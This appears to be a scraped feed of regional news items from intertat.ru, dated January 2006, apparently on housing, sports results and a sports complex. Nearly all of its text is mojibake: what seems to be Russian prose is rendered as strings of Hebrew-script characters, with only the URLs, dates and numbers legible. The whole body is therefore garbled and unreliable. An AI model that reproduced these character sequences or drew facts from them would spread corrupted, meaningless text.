װֵׂװ״ֵַֿ ׀ֱִֵֵָֿׂ - ־ֱִֵֽ־ַֿֿ ֹֹּ ׀ִֵֽֿ־ַֿֿ ֹ, ֻֿ־ֵ־ֿ ׃ֿ ׃ֵֹֻֽֿׂ ֱ׳ֵֵׂ־ֵֹֽ ׃װֹֿׂװֵּ״׃װ׳ֱ ׳װַֿֿֿׂ ׀ֱִֵֵָֿׂ.ץ ֱֻׂװ ׀ֿ׃ֱֵֻּ קֹֻװֿׂ ףֱֹּֽ־ ֿװ׳ֵװֹּ ־ֱ ֽ־ֵַֹֿ ׳ֿ׀ֿׂ׃ ֹ ׀ִֿ־ּׁ ־ֿ׳ֵ ׀ֲֵּֽֿׂ. מֱ׀ֵֹֽׂׂ, ֲױׂ־ֵֿ ׃װֹֿׂװֵּ״׃װ׳ֿ ־ֿ׳ָ ֻֿװװִֵײ־ָ ׀ֿ׃ֵֻּֿ׳, ֻֿװֵֿׂ ׳ִָֿׁװ ׳ ׃ֿ׃װֱ׳ תֱֵּ׃־ַֿֿ, ׳ִ׳ֹ־ױּֿ ׀ֲֵּֽֿׂױ ֱַֿׂ־ֱֳֹֹֹ ֱֽׂׂױװ־ַֿֿ װֱׂ־׃׀ֿׂװֱ, ֲֿֿ׃װֱֹּׂ׃״ ׀ֱֲֵּֽֿׂ ֱֻ־ֱֹֹּֿׂ׳ֱ־ֹׁ, ֿ׃׳ֵֵ־ֹׁ, ֱ׃ֱֶּ״װֹֿׂ׳ֱ־ֹׁ ױֳֹּ. ק ־ֱִֵַֻֿ ֱֵּֽ־״ֻֽֿ ׀ִֵַֹֿֿׂׂ ׃ִֵַֿ־ׁ ׀ֿׂײֹ׳ֱֵװ ֻּֿֿֿ 10,5 װ׃ׁ ֵּֿ׳ֵֻ.כֱֻ ֱׁ׳ֹּ ֱַּ׳ֱ ֱִֹֽ־ֹ׃װֱֳֹֹׂ כֹֿׂ׳׃ַֻֿֿ ֱֿׂ־ֱ בֵֻּ׃ֱ־ִׂ גֱֵׂ׳, ֵײִֵַֿ־ֿ ִֵ׃״ ׃װְֱֱׂװ׃ׁ ֱֱ׃ֱֶּ״װֹֿׂ׳ֱװ״ ָֿװׁ ֲ ִֿ־ױ ױֳֹּױ. ו׃װ״ ׳ֿ׀ֿׂ׃, ֻֿװֵֿׂ ְֱֵׂװ׃ׁ ־ֱ ױֿׂ׳־ֵ םףץ ֹ ֱֿׂ־־ַֿֿ ׳ֵ־ֱ ױ׀ֱׂ׳ֵּ־ֹׁ, ־ֿ ֵ׃װ״ ֹ װֱֵֹֻ, ֻֿװֵֿׂ ׃׀ֿ׃ֲֿ־ֱ ֵֹׂװ״ װּֿ״ֻֿ ִַֿֿׂ׃ֱֻׁ ׳ֱּ׃װ״. װֿ ֱֻ׃ֱֵװ׃ׁ ־ֱ׀ֿׂ־ַֿֿ ֵֻֻּּֿװֱֿׂ, ִֵַ װֲֵׂױֵװ׃ׁ ׀ֵֵּֿׂײֹװ״ ׀ֵֹֽׂׂ־ֿ 400 ׀ַֿֿ־־ָ ֵֽװֿׂ׳ װׂױֲ.ק װֿװ ִֵ־״ עֱֶֹ׃ גױֱַׂ־ֿ׳, יֱׂװ םֹ־ֹֻ־ ֹ ִׂױֵַֹ ױֱ׃װ־ֹֹֻ ֱִֵׂ ׀ֲֿ׳ֱֹּ ׀ֱֻׂװֵֹ׃ֹֻ ׳ֿ ׳׃ֵָ ׀ֿ׃ֱֵָֻּ כֹֿׂ׳׃ַֻֿֿ ֱֿׂ־ֱ. ק אִֹ־ֿ ֿ ׀ֱֲֵָּֽֿׂ ׀ֿ׃ֱֵֻּ ײֵֵּ־ִֿֿֿׂײ־ֹֻֿ׳ ֹֽ ֱׂ׃׃ֱֱֻּ ֹ׃׀ּֿ־ְֹׁ ֱֲֿׁ־־ֿ׃װֹ ׂױֻֿ׳ִֹֿװֵּׁ םףץ בֵֻּ׃ֱ־ִׂ גֱֹֻּׁ־. אִֹ־ֿ - ִֹֿ־ ֹ ׃ֱָֽ ֱֻׂ׃ֹ׳ָ ֹ ֱֲַּֿױ׃װֵֿׂ־־ָ ׀ֿ׃ֵֻּֿ׳. ם־ֵַֿֿ ׃ֱִֵּ־ֿ ֹ ֱִֵֵּװ׃ׁ ִּׁ װַֿֿ, װֲֿ װױװ ֲּֿ ֶֻֽֿֿׂװ־ֿ ֹ ׀ֹׁׂװ־ֿ ײֹװ״. קֿ ֽ־ַֽֿֿ ֱֱֲִַּֿׁׂ ׂױֻֿ׳ִֿ׃װ׳ױ כֱֱ־׃ַֻֿֿ ֿװִֵֵּ־ֹׁ חצה. נֱֻׂװֵֹ׃ֹֻ ֵײִֵַֿ־ֿ ײֵֵּ־ִֿֿֿׂײ־ֹֹֻ ׃ְֱִװ ־ֿ׳ ײֹּֿ ִֽֿ. ב ׳ֿװ ׀ֿ ׀ֱֵַֽֽֿׂׂ ֹֻּ׳ֱֳִֹֹֹ ׳ֵװַָֿֿ ײֹּ״ׁ ׳ ׀ֿ׃ֵֵֻּ ֲּֿ ׀ֿ׃װֵֿׂ־ֿ װּֿ״ֻֿ ִ׳ֱ ֽ־ַֻֿֿ׳ֱׂװֹׂ־ָ ֱִֽֿ, װֿ ִֿ ֻֿ־ֱֳ ־ֵ ֵֹּֿׂ ׀ֲֵּֽֿׂױ. ףװֱָׂ ִֽֿֿ׳, װֲֵֻׂױְָֹ ִַֿֿֿׂ׃װֵַֿֿׁ ֱֻ׀ֹװֱּ״־ַֿֿ ֵֽֿׂ־װֱ װױװ ֵֵ ֽ־ַֿֿ.צֵֵּ־ִֿֿֿׂײ־ֹֹֻ ־ֱִֿׂ ־ֲִֵֵ־, ָֿװׁװ ׃װֹֿׂװ״ ֱ׃װ־ֵ ֱִֽֿ, ־ֿ ׀ֲֵּֽֿׂ ׃ ֵֵּֽֿװ׳ִֽֿֿ ׀ִֿ ֱ׃װ־ױְ ֱ׃װֻֿׂױ װֽֿֿׁׂװ ׳׃ֵ ִֵּֿ. כֿ־ֵ־ֿ ׳ װֱֻֽֿ ׀ֿ׃ֵֵֻּ, ׃׳ֱׁ־־ֽֿ ׃ ֳֵ־װֽֿׂ ֱִַֿֿׂ ֿװֹּ־ֹֽ װֱׂ־׃׀ֿׂװ־ֹֽ ֻֽֽֿױ־ֱֳֹֹֹֻֽׁ ֹ ׃װֹֿׂװ״ ֽ־ַֻֿֿ׳ֱׂװֹׂ־ֵ ֱִֽֿ ִַֿֿׂױ ׳ִַֿ־ֵֵ, ־ֿ ײֹֹּ־ ׳ֿ׀ֿׂ׃, ׀ֿ ֽ־ֵ־ְֹ ױֱ׃װ־ֹֻֿ׳ ׀ִֵֹֻֿ ֽֿײֵװ ֲװ״ ֵֵׂ־ ֹ ֻֽֿ׀ֵֻּ׃־ֿ, װ.ֵ. ׃ ױֵװֽֿ ֹ־װֵֵׂ׃ֿ׳ ֹ־ִֹ׳ִֹױֱּ״־ָ ֱ׃װֹֻֿֿׂ׳.«לְִֹ ָֿװׁװ ײֹװ״ ֶֻֽֿֿׂװ־ֿ, ִֿ׃װֿ־ֿ ֹ ־ֱֱ ֱֱֱִ ׀ֽֿֿ״ ֹֽ ׳ װֽֿ, - ׃ֱֱֻּ, ֿװ׳ֱֵׁ ־ֱ ׳ֿ׀ֿׂ׃ ײױׂ־ֱֹּ׃װֿ׳, ֹ׃׀ּֿ־ְֹׁ ֱֲֿׁ־־ֿ׃װֹ ֱַּ׳ ֽױ־ֳֹֹ׀ֱּ״־ַֿֿ ֱֲֿֿׂ׳ֱ־ֹׁ ַ. כֱֱ־״ עֱֶֹ׃ גױֱַׂ־ֿ׳. - קֱֵׂ ֽ ֱֲֵָֹּֿ םֿ׃ֻֿ׳׃ֹֻ ֹ ב׳ֱֹ׃װֹֿׂװֵּ״־ ֱֿׂ־. װֿ ־ֵ ֱֱֻֻׁ-װֿ ֱֿׂ׳ֱׁ ֱֳֹֻׁ. ק װֽֿ ִַֿױ ׳ ׀ֱּ־ֵ ֱֲֿׂװ ִַֿֿׂ׃ֻֿ הױֽ ֵ׃װ״ ׳ֿ׀ֿׂ׃ ֱֱֳֵֹֹֹּׂ ֱִ׳־ֿ װױײֵ ׀ֹׂ־ׁװֿ ׀ֱַֽֽֿׂׂ «נֿ׃ֵֻּֿ». ם־ֵַֿֿ ױײֵ ׃ֱִֵּ־ֿ, ־ֿ ׀ֿׁ׳ֹֹּ׃״ ֹ ־ֿ׳ֵ ׀ֲֵּֽֿׂ. יָ ־ֱִֿ ׃ֹ׃װֱֵֽװֹֹֿׂ׳ֱװ״, ׃ֻֿ־ֳֵ־װֹֿׂׂ׳ֱװ״ ׳ֿ׀ֿׂ׃, ׳־ֵ׃װֹ ֵֻֻֿׂׂװֹֿׂ׳ֹֻ ׳ ׀ֱַֽֽֿׂׂױ ֹ ֹ׃ֱֻװ״ ֵׂ׃ױׂ׃ ִּׁ ֵֵׂ־ֹׁ ־ֱ׃ױ־ָ ֵֽֽֿ־װֿ׳ ׀ֿ ֱֱֳֶַֹֹֹֹֻ, ׳ִֿֿ׃־ֱֲײֵ־ְֹ, ֱ׃ֱֶּ״װֹֿׂ׳ֱ־ְֹ ױֳֹּ, ִ׳ֿֿׂ׳ָ װֵֹׂׂװֹֿׂ, ֿ׃׳ֵֵ־ְֹ, ֱֻ־ֱֹֹּֿׂ׳ֱ־ְֹ, ׃װֹֿׂװֵּ״׃װ׳ױ װֵָ ײֵ ִֿֿׂײ־ָ ׀ִֵֵָֿֿׂ׳. מֿ ׳׃ֵ װֿ ־ֵ ִּֿײ־ֿ ׃װֱװ״ װּֿ״ֻֿ ֹּ״ ֱֱֳִֵֵֹֻּׂ ־ֱֵֵֽׂ־ֹ, ֱ ֱֵּׂ״־ֽ ֵֵׂ־ֵֹֽ ׃ֱָֽ ֲִּֿֿ־ֵ׳־ָ װֵֽ».עֱֶֹ׃ גױֱַׂ־ֿ׳ װֱֻײֵ ֿװֵֽװֹּ, װֿ ־ֱֱ׳ֵֹ׃ׁ ׳ֿֿׂײִֵ־ֵֹ ֹ־׃װֹװױװֱ ֱַּ׳ ֵֽ׃װ־ָ ױ׀ֱׂ׳, ֱַֿׂ־ֿ׳ ֲֵֿ׃װ׳ֵ־־ַֿֿ ױ׀ֱׂ׳ֵּ־ֹׁ ׳ ־ֿ׳ָ ׀ֿ׃ֱֵָֻּ, ֱֻֻ ׀ּֿ־ֽֿֿ־ָ ׀ִֵׂ׃װֱ׳ֹװֵֵּ ֹ׃׀ּֿ־ֹװֵּ״־ֿ ׳ֱּ׃װֹ, ׳ֿ ֽ־ַֽֿֿ ׀ֽֿֿײֵװ ִֿ׳ֵ׃װֹ ־ֱֱװֵ ֱִֵּ ִֿ ֻֿ־ֱֳ.«ם ־ֵ ֽֿײֵֽ ׃ֲֵֵ ׀ֿ׳ֹּֿװ״ ֿװֱִָװ״ ׳׃ֵ ־ֿ׳ִַֿֿ־ֵֹ ֹ ֿׂײִֵ׃װ׳ֵ־׃ֵֹֻ ׀ֱׂ־ֹ־ֵ ִ־ֹ ֹ ׀ֿװֽֿױ ױײֵ ׃ֿ 2 ׁ־׳ֱׁׂ ־ֱֱֹּ װֱֵֹֻ ׀ִֵֹֻֿ ׀ֿ ֱֿׂ־ֱֽ כֱֱ־ֹ», - ׃ֱֱֻּ ֱֵֽ׃װֹװֵּ״ ֱַּ׳ ֱִֹֽ־ֹ׃װֱֳֹֹׂ כֱֱ־ֹ יֱׂװ םֹ־ֹֻ־. - װֹ ׳ִָֿ־ֵ ִּׁ ֲּֿ״ֹ־׃װ׳ֱ ַֿֿׂײֱ־ ִ־ֹ ױֲִֿ־ װֵֽ, װֿ ֽ ׃ֱֹֽ ֵֽ־ֵֵ ֱַׂױײֵ־, ֵֽ ֲֿ־ֿ ֹ ֽֿײֵֽ ׃׳ֹֹֽֿ ֱֱַֹּֽ ױֲִֵֹװ״׃ׁ ׳ ׃ױֵ׃װ׳ֿ׳ֱ־ֹֹ װֿ ֹֹּ ֹ־ֿ ׀ֲֵּֽֿׂ, ֲֲֹֿֿװ״ ױ׳ִֵֹ־־ֵֿ, װֿ, ׳ ֻֿ־ֵ־ֽֿ ׃ֵװֵ, ׀ֽֿֿײֵװ ׀ֹׂ־ׁװ״ ׀ֱׂ׳ֹּ״־ֵ ֵֵׂ־ֹׁ».ףֲֿׂ־ֱׁ עֿ׃׃ֹֹ ׳ ׀ּֿױֶֹ־ֱֵּ ׃ֱֵַׂװ ׃ ֱֻֽֿ־ִֿ ףבhttp://intertat.ru/index.php?id=80169קֱַֹׂ׳ ַׂױ׀׀ֿ׳ֿ װױׂ־ֹׂ ֵֽ׀ֹֿ־ֱװֱ ֱֹֽׂ ׀ֿ ְֵָֻֻֿ ׳ כֱ־ֱִֵ, ִֵּֽֿֿײ־ֱׁ ׃ֲֿׂ־ֱׁ עֿ׃׃ֹֹ, ׳ ׃ֿ׃װֱ׳ֵ ֻֿװֿֿׂ ְֱַֹׂװ װֹׂ ֵָֹֻֻֿ׃װֱ «בֻ גֱׂ׃ֱ» - תױֱֲֵׂ׳, א־״ֻֿ׳ ֹ לֹ׃ֹ־, ־ֱ׀ֽׁׂױְ ׳ֱּ ׳ ׀ּֿױֶֹ־ֱּ. וֵ ׃ֿ׀ֵׂ־ֹֻֽֿ ׃װֱ־ֵװ ׃ֲֿׂ־ֱׁ ףב, ׳ֱַֹׂ׳ֱׁ ׃ִֵַֿ־ׁ ױװֽֿׂ ׳ ֵװ׳ֵׂװ״ֶֹ־ֱֵּ ױ ֱֻֽֿ־ִ ‏ֵָֹֹ - 2:1.׃׀ֿׂװTue, 03 Jan 2006 12:28:34 +0300קֱַֹׂ׳ ַׂױ׀׀ֿ׳ֿ װױׂ־ֹׂ ֵֽ׀ֹֿ־ֱװֱ ֱֹֽׂ ׀ֿ ְֵָֻֻֿ ׳ כֱ־ֱִֵ, ִֵּֽֿֿײ־ֱׁ ׃ֲֿׂ־ֱׁ עֿ׃׃ֹֹ, ׳ ׃ֿ׃װֱ׳ֵ ֻֿװֿֿׂ ְֱַֹׂװ װֹׂ ֵָֹֻֻֿ׃װֱ «בֻ גֱׂ׃ֱ» - תױֱֲֵׂ׳, א־״ֻֿ׳ ֹ לֹ׃ֹ־, ־ֱ׀ֽׁׂױְ ׳ֱּ ׳ ׀ּֿױֶֹ־ֱּ. וֵ ׃ֿ׀ֵׂ־ֹֻֽֿ ׃װֱ־ֵװ ׃ֲֿׂ־ֱׁ ףב, ׳ֱַֹׂ׳ֱׁ ׃ִֵַֿ־ׁ ױװֽֿׂ ׳ ֵװ׳ֵׂװ״ֶֹ־ֱֵּ ױ ֱֻֽֿ־ִ ‏ֵָֹֹ - 2:1.נֿ׃ִֵּ־ֹ ֱֽװ ׳ ַׂױ׀׀ֿ׳ֽֿ װױׂ־ֵֹׂ ׃ֲֿׂ־ֱׁ עֿ׃׃ֹֹ ׀ֿׂ׳ֱִֹּֿ ׃ ֱֻֽֿ־ִֿ ‏ֵָֹֹ ֹ ױ׳ֵֵׂ־־ֿ ׀ֱֲִֵֹּֿ - 7:2. כֱִַֿ ֱֲֹ׳ֱֱּ׃״ ׀ׁװֱׁ ֱֱֲ, ֵַּֿ׳ֿ ׀ֱ׃ ֿװֱִּ תױֱֲֵׂ׳, ֱ ֵ׃װֿ ַּֿ ׳ ׳ֿֿׂװֱ ֵָֿ׳ ֱ׀ֹ׃ֱּ ־ֱ ׃׳ֿ ׃ֵװ לֹ׃ֹ־.נֱֱֻֿ׳ ׃װֿ׀ֳֵֿׂ־װ־ ֵׂױּ״װֱװ, ֿׂ׃׃ֹׁ־ֵ, ֱֻֻ ֹ ֱֻ־ֱֳִ, ־ֱ׀ֽׁׂױְ ׳ֹּ ׳ ׀ּֿױֶֹ־ֱּ. ףֲֿׂ־ֱׁ כֱ־ֱֱִ ׃ֱֵַׂװ ׳ ׀ּֿױֶֹ־ֱֵּ ׃ ֱֻֽֿ־ִֿ זֹ־ּׁ־ִֹֹ, ׳ֱַֹׂ׳ֵ ױ ׳ִֵ׃ֻֿ ׃ֲֿׂ־ֿ ׳ ֿ׳ֵׂװֱֵֽ. נֲִֵֿ־ױְ ֱֲױ ֶֹ־־ ֱֲֿׂ׃ֹֹּ ־ֱ ׀ֿ׃ִֵּ־ֵ ֹֽ־ױװֵ ִֿ׀ּֿ־ֹװֵּ״־ֿ ִֵ׃ׁװֹֹֽ־ױװֹֻ, ֱ ֿ׃־ֿ׳־ֵֿ ׳ֵֽׁׂ ֱ׳ֵֹּֿׂ׃״ ׳־ֹ״ְ - 0:0.חִֿ ־ֱֱִ ־ֱ ֵֽ׀ֹֿ־ֱװֵ ֱֹֽׂ ׳ ֱֱֵֹֻֽׂ־׃ֻֽֿ ִֵַֿֿׂ חֱׂ־ִ זֻֿׂ׃ ׃ֲֿׂ־ֱׁ עֿ׃׃ֹׁ ׳ ׀ּֿױֶֹ־ֱֵּ װֱֻײֵ ׳׃װֱֱֵּׂ׃״ ׃ֿ ׃ֲֿׂ־ֿ ףב, ֻֿװֿׂױְ ֱֱֲַּֿׂ - 7:2. פֱִַֿ ׀ֿ ִ׳ֵ ֱֲ ֱֲֿׂ׃ֹֹּ ן׳ֵֹֻ־ ֹ םֱֹֻּ־. ק ֶֹ־ֱֵּ ִַֿ ־ֱֱִ ֿׂ׃׃ֹׁ־ֵ ױ׃װױ׀ֹֹּ ֱֻ־ֱֱֳִֽ - 1:6. מֿ םֱֹֻּ־, ׳ֱַּֿ׳ְֹּׁ ׃׀ֹ׃ֻֿ ּױָֹ ֱֲֲִֹֽֿֿׂׂ׳ ֵֽ׀ֹֿ־ֱװֱ, ֹ ׃ִֵַֿ־ׁ ׳ ׃ֿ׃װֱ׳ֵ ֿׂ׃׃ֹ׃ֻֿ ֱֻֽֿ־ִ, ֹ ַֹֿׂװ ײֱֵּ־ֵֹֽ ׳ׁװ״ ֵׂ׳ֱ־ ֱ ׀ִַּֿֿֿׂ־ְְ ־ֵױֱִױ ׳ ֶֹ־ֱֵּ.ק מֿ׳ֽֿ ִַֿױ ְװֱֹ־ֳ ׀ּֿױֱװ ׳ ׀ֱִֻֿֿׂ ֲּֿ״ֿ ׃׀ֿׂװֹ׳־ ֻֽֿ׀ֵֻּ׃http://intertat.ru/index.php?id=80168ק ־ֱ׃װױ׀ֹ׳ֵֽ ִַֿױ ײֹװֵֵּ ִֿ־ַֿֿ ֹ ׃ֱָֽ ֿװֱִֵּ־־ָ ֱֿׂ־ֿ׳ ֵׂ׃׀ױֲֹֹֻּ - אװֱֹ־׃ַֻֿֿ - ֿײֱִֵֹװ ׃ֱׂױ ־ֵ׃ֻּֿ״ֻֿ ׀ֹׁׂװ־ָ ׃ֲֿװֹ.׃׀ֿׂװTue, 03 Jan 2006 12:22:06 +0300ק ־ֱ׃װױ׀ֹ׳ֵֽ ִַֿױ ײֹװֵֵּ ִֿ־ַֿֿ ֹ ׃ֱָֽ ֿװֱִֵּ־־ָ ֱֿׂ־ֿ׳ ֵׂ׃׀ױֲֹֹֻּ - אװֱֹ־׃ַֻֿֿ - ֿײֱִֵֹװ ׃ֱׂױ ־ֵ׃ֻּֿ״ֻֿ ׀ֹׁׂװ־ָ ׃ֲֿװֹ.ץײֵ ׳ ׀ֵׂ׳ֽֿ ֻ׳ֱׂװֱֵּ ׳ ֱֿׂ־־ֽֿ ֳֵ־װֵׂ - ֱֲֵֽֿׂ ׀ֿ׃ֵֵֻּ ץׂױ׃׃ױ ׳׃װױ׀ֹװ ׳ ׃װֿׂ ֲּֿ״ֿ ׃׀ֿׂװֹ׳־ ֻֽֿ׀ֵֻּ׃. ק ־ֵֽ ֲױִױװ ֱׂ׃׀ֱֱַּֿװ״׃ׁ ִ׳ֱ ׀ֱּ׳ֱװֵּ״־ָ ֱֲ׃׃ֵ־ֱ, ֱֵַֻּֿװֵּװֵֹ׃ֹֻ ֱֽ־ֵײ, ױ־ֹ׳ֵׂ׃ֱּ״־ ַֹֿׂ׳ֿ ֱּ, ֲֳֿֿׂ׳׃ֱֻׁ ֱֵׂ־ֱ, װֵׂ־ֱײֵׂ־ ֱּ, ֻֽֿ־ֱװ ִּׁ ֱ־ׁװֹ ֱֲֹֻֿֿׂ, ֱ ֵֻֽֿׂ װַֿֿ ֲױֵֶװ, װֵׂ־ֵׂ׃ֵֹֻ ֻֽֿ־ֱװ ֹ ֱִֵׂ׳ֱֹֻּ, ִױֵ׳ֵ ֹ ׀ֵֵֽֿ־ֹׁ ִּׁ ֱָׂ־ֵ־ֹׁ ׃׀ֿׂװֹ׳־ַֿֿ ֹ־׳ֵ־װֱׁׂ. הֿ ׃ָֹ ׀ֿׂ ׳ ץׂױ׃׃ױ ׀ֱּ׳ֱװֵּ״־ַֿֿ ֱֲ׃׃ֵ־ֱ ־ֵ ֲּֿ. פֵ׀ֵׂ״ ײֵ ־ֿ׳ֽֿױ ׃׀ֿׂװֹ׳־ֽֿױ ׃ֿֿׂױײֵ־ְֹ ֽֿײֵװ ׀ֱֿ׳ִֹֿ׳ֱװ״ ׃ֿ׃ִֵ־ֹ ִַֿֿׂ ןֻװֲׁׂ״׃ֹֻ (גֱֻֿׂװֿ׃װֱ־), ֻױֱִ ֱׂ־״ֵ ְװֱֹ־׃ֵֹֻ ְֲֹּװֵֹּ ׀ֱּ׳ֱ־ֹׁ ֱֲִֹֹּֿׂ׃״ ־ֱ ֱ׳װֲֿױ׃ֵ. ק ֲּֿ״ֽֿ ֱֲ׃׃ֵ־ֵ ֵװֵׂ ׀ֱּ׳ֱװֵּ״־ֵ ִֿֿׂײֹֻ ִֹּ־ֿ 25 ֵֽװֿׂ׳. פױװ ֲױִױװ ֱ־ֱֹֽװ״׃ׁ ׀ֱּ׳ֱ־ֵֹֽ ׳ֿׂ׃ֵּ, ֱ ִּׁ ־ֵ ױְֵָֹֽ ׀ֱֻֿ ׀ֱּ׳ֱװ״ ֱֵּֽ, ׃ֱִֵּ־ ׃׀ֱֳֵֹּ״־ ֹֽ־ֹ-ֱֲ׃׃ֵ־ ־ֲֵּֿ״ֿ ַּױֲֹ־. ףּֿ׳ֽֿ, ׃װֱ־ֵװ ׃׀ֿׂװֻֽֿ׀ֵֻּ׃ ־ֵ װּֿ״ֻֿ ֳֵ־װֽֿׂ ִֿֿׂ׳״ׁ ֹ ׃׀ֿׂװֱ, ־ֿ ֹ ֳֵ־װֽֿׂ ׃ֵֵֽ־ַֿֿ ִֿ׃ױֱַ. ץ־ֹ׳ֵׂ׃ֱּ״־ ַֹֿׂ׳ֿ ֱּ ׃׀ֿׂװֹ׳־ַֿֿ ֻֽֿ׀ֵֻּ׃ֱ ׀ֿ׳ֵּֿׁװ ׀ֿׂ׳ִֹֿװ״ ֱֽװֹ ׀ֿ ׳ֲֵּּֿֿױ, ֱֲ׃ֵֻװֲּֿױ, ֱַ־ֲִּֿױ ֹ ֹֽ־ֹ-ֶױװֲּֿױ. תִֵ׃״ ֲױִֵװ ׃ֱִֵּ־ ׃׀ֱֳֵֹּ״־ ׀ֱֵֻׂװ, ׀ֿװֽֿױ ְװֱֹ־ֳ ׃ֿ ׳ֵֵֽׂ־ֵֽ ׃ַֽֿױװ ׀ֹׂ־ֱֹֽװ״ ױ ׃ֲֵׁ ׃ֵֿׂ׳־ֿ׳ֱ־ֹׁ ׳׃ַֻֿֿֿ ֵׂ׃׀ױֱֲֹֻּ־׃ַֻֿֿ ֱׂ־ֱַ. פֿ ײֵ ֽֿײ־ֿ ׃ֱֱֻװ״ ֹ ֿ ֱֵַֻּֿװֵּװֵֹ׃ֻֽֿ ֱֽ־ֵײֵ, ִֵַ «ֵֻּֿֿׂ׳ֱ ׃׀ֿׂװֱ» ׃׀ֿ׃ֲֿ־ֱ ׀ֱֱֻֿװ״ ׃ֲֵׁ ׳ֿ ׳׃ֵ ֱֻׂ׃ֵ. נֱֻׂװֵֹ׃ֹֻ ְֲּֽ ׳ִֹֽֿ ֵַֻּֿ ֱװֵּװֹֹֻ ֿװ ׃׀ֹׂ־װֵׂ׃ַֻֿֿ ֱֲֵַ ִֿ ׀ׂײֻֿ׳ ׃ ֵ׃װֽֿ ִֵ׃״ ׃ַֽֿױװ ֱ־ֱֹֽװ״׃ׁ ֹ ׳ֿׂ׃ֵּ ֹ ִֵװֹ. ן ֲֳֿֿׂ׳׃ֻֿ ֱֵׂ־ֵ ׃װֹֿװ ׃ֱֱֻװ״ ֿ׃ֲֿֿ, ׳ִֵ״ ְװֱֹ־׃ֵֹֻ ֱֲװׂ ֹ׳ֵ׃װ־ ׳׃ֵ ֵׂ׃׀ױֲֵֹֻּ. מֱֳֹֿ־ֱּ״־ֱׁ ֲֿׂ״ֱֲ ֻױׂ, ֵַֻֿׂ-ֹֽׂ׃ֱֻׁ ֲֿׂ״ֱֲ, ֲֻֿ׃ ֹ ֵַֹׂ׳ֿ ׃׀ֿׂװ - ׳׃ֵ װֿ ֵֿ־״ ׀ֹׂ׳ֱֵֵֻּװ ִֵּֽֿֿײ״. תֱ ׃ֵֿׂ׳־ֿ׳ֱ־ֹֹֽׁ ֲֳֿֿׂ׳ ֹ ֲֻֿ׃ֵֿׂ׳ ֹׂװֵֹּ ׃ַֽֿױװ ־ְֱֱֲִּװ״ ׃ װֲֹׂױ־, ֱׂ׃׀ּֿֿײֵ־־ֿ ־ֱ ֱ־װֵׂ׃ָּֿׁ ֲֳֿֿׂ׳׃ֻֿ ֱֵׂ־. קֽֿֿײ־ֿ, ִֵ׃״ ׳׃ֵֻֿׂ ׀ֿׁ׳ׁװ׃ׁ ֹ ׃ֳֵֹֻׁ ׳ֿ׃װֿ־ָ ִֵֹ־ֲֿֿׂ׃װ׳ - ֱַּ׳־ֵֿ ־ֱװֹ װֵׂ־ֵֿׂ׳, ְִֵּ װ׳ֵֿׂ׃ָֹֻ ֹ ױ׳ֵֵּ־־ָ. כ׃װֱװֹ, ׳ ־ֿ׳ֽֿ ׃׀ֿׂװֹ׳־ֽֿ ֻֽֿ׀ֵֻּ׃ֵ ׀ּֿױֱװ ֱֲֿׂװױ ֲֵֵּֿ 40 ֵּֿ׳ֵֻ. פֵׂ־ֱײֵׂ־ ֱּ ׀ֱּ־ֹׂױֵװ׃ׁ ֲֿֿׂױִֿ׳ֱװ״ ׃ֱֹֽֽ ׃ֿ׳ֵֵֽׂ־־ֹֽ ׃׀ֿׂװֹ׳־ֹֽ ׃־ֱֱִֹֽׁׂ ֹ װֵׂ־ֱײֱֵֹֽׂ - װֱֻ װֿ ײְֱֵֹּֽ ׃ֵׂ״ֵ־ֿ ֱ־ׁװ״׃ׁ ֲֲִִֹֹֹּֿ־ַֽֿ ֹֹּ ׀ֿׂ׃װֿ ׀ֱֱִֻֿװ״ ֳֽ ִֵ׃״ ֲױִױװ ׃ֱִֿ־ ׳׃ֵ ױ׃ּֿ׳ֹׁ.ף׀ֿׂװֻֽֿ׀ֵֻּ׃ ֲּ ׀ֿ׃װֵֿׂ־ ׳׃ֵַֿ ֱ ִ׳ֱ ֱִַֿ ֹ ־ֵ ־ֱ ׀ױ׃װֽֿ ֵֽ׃װֵ. ףִֵַֿ־ׁ ֱּֽֿ ֻװֿ ױ־ֱֵװ ׳ ֱ׃װֹ ֵַֿ ׃ֿֿׂױײֵ־ֹ ֲ׳ֹ ֳֵָ ֲױֿׂ׳ָ ױֻׂװֹ ןבן «גֱ־ֵֶװ״», ֻֿװֿׂ ֲּ ׳ֻױ׀ֵּ־ ױ ׃ֿ׃ִֵֵ. נֿ ׃ּֿ׳ֱֽ ֱַּ׳ ֱִֹֽ־ֹ׃װֱֳֹֹׂ אװֱֹ־׃ַֻֿֿ ֱֿׂ־ֱ בֱּֽ׃ֱ ףֱֱָ׀ֿ׳ֱ, ׃ֵֽװ־ֱׁ ׃װֹֽֿֿ׃װ״ ׃װֹֿׂװֵּ״׃װ׳ֱ ׃׀ֿׂװֹ׳־ַֿֿ ֻֽֿ׀ֵֻּ׃ֱ ׃ֿ׃װֱ׳ֱֹּ 63 ּֽ־. ׂױֲֵּ. גּֿ״ױְ ֱ׃װ״ װֿ ׃ױֽֽ ׳־ֵ׃ֹּ ־ֵֶװׁ־ֹֹֻ - 40 ּֽ־. ׂױֲֵּ ׀ִָֹֹֿׂװ׃ׁ ־ֱ ְִּֿ ןבן «פֱװ־ֵֶװ״» ֹ 23 ּֽ־. ׂױֲֵּ ׀ֿ׃װױ׀ֹּֿ ֹ ְֲִײֵװֱ ֵׂ׃׀ױֲֹֹֻּ ׀ֿ ֱׂ׃׀ֿׁׂײֵ־ְֹ נֱׂ׳ֹװֵּ״׃װ׳ֱ עפ.כ׳ֱׂװֹׂ ִּֽֽֿֿ ְװֱֹ־׃ֹֻֽ ׃ֵֽ״ֽׁ - ׳ ׀ֱִֻֿֿׂ ֻ מֿ׳ֽֿױ ִַֿױhttp://intertat.ru/index.php?id=80167תֱֱֵֽװֵּ״־ ־ֿ׳ִַֿֿ־ֹ ׀ֱִֻֿֿׂ - ׳ֽֿֿײ־ֿ׃װ״ ׀ֲֵֹֿׂׂװֵ־ֹׁ ײֹּ״ׁ ׀ּֿױֹֹּ 14 ִָּֽֿֿ ׃ֵֵֽ אװֱֹ־׃ַֻֿֿ ֱֿׂ־ֱ.ֲֵֿ׃װ׳ֿTue, 03 Jan 2006 12:06:56 +0300תֱֱֵֽװֵּ״־ ־ֿ׳ִַֿֿ־ֹ ׀ֱִֻֿֿׂ - ׳ֽֿֿײ־ֿ׃װ״ ׀ֲֵֹֿׂׂװֵ־ֹׁ ײֹּ״ׁ ׀ּֿױֹֹּ 14 ִָּֽֿֿ ׃ֵֵֽ אװֱֹ־׃ַֻֿֿ ֱֿׂ־ֱ.ק ֱֻ־ױ־ מֿ׳ַֿֿ ֱִַֿ 